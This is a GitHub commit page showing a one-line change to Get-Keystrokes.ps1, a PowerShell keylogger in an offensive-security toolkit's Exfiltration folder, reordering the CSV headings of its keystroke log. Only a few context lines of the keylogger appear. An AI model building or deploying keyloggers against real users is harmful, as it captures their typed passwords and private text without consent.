Skip to content
This repository was archived by the owner on Jan 21, 2021. It is now read-only.

Commit 2153a0a

Browse files
committed
Merge pull request #68 from hydrajump/get-keystrokes-headings-reorder
Fix for headings in wrong order
2 parents 5b1a775 + 0045054 commit 2153a0a

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

Exfiltration/Get-Keystrokes.ps1

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -49,7 +49,7 @@ function Get-Keystrokes {
4949
$Initilizer = {
5050
$LogPath = 'REPLACEME'
5151

52-
'"TypedKey","Time","WindowTitle"' | Out-File -FilePath $LogPath -Encoding unicode
52+
'"WindowTitle","TypedKey","Time"' | Out-File -FilePath $LogPath -Encoding unicode
5353

5454
function KeyLog {
5555
[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null

0 commit comments

Comments
 (0)